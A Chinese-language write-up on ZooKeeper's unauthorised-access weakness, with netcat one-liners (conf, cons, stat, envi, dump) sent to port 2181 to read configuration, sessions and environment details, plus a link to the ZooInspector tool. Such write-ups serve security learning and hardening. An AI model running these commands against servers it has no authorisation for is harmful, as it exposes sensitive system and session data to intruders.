漏洞簡介

ZooKeeper是一個(gè)分布式的，開放源碼的分布式應(yīng)用程序協(xié)調(diào)服務(wù)，是Google的Chubby一個(gè)開源的實(shí)現(xiàn)，是Hadoop和Hbase的重要組件。它是一個(gè)為分布式應(yīng)用提供一致性服務(wù)的軟件，提供的功能包括：配置維護(hù)、域名服務(wù)、分布式同步、組服務(wù)等。
ZooKeeper默認(rèn)開啟在2181端口，在未進(jìn)行任何訪問控制情況下，攻擊者可通過執(zhí)行envi命令獲得系統(tǒng)大量的敏感信息，包括系統(tǒng)名稱、Java環(huán)境。

漏洞復(fù)現(xiàn)

1、獲取信息-conf命令

// conf參數(shù)：輸出相關(guān)服務(wù)配置的詳細(xì)信息，端口、數(shù)據(jù)路徑、日志路徑、session 超時(shí)時(shí)間，最大連接數(shù)等。
echo conf | nc ip 2181

image.png

2、獲取信息-cons命令

// 列出所有連接到當(dāng)前服務(wù)器的客戶端/會(huì)話的詳細(xì)信息。
echo cons | nc ip 2181

image.png

3、獲取信息-stat命令

// 列出關(guān)于性能和連接的客戶端的統(tǒng)計(jì)信息
echo stat | nc ip 2181

image.png

4、獲取信息-envi命令

// 打印有關(guān)服務(wù)環(huán)境的詳細(xì)信息
echo envi | nc ip 2181

image.png

5、獲取信息-dump命令

// 輸出未處理的會(huì)話和臨時(shí)節(jié)點(diǎn)，leader 節(jié)點(diǎn)有效
echo dump | nc ip 2181

image.png

6、可視化工具連接

工具下載鏈接：https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
第二步添加ip
第三步添加SessionTracker，上述dump命令可獲取到

image.png

image.png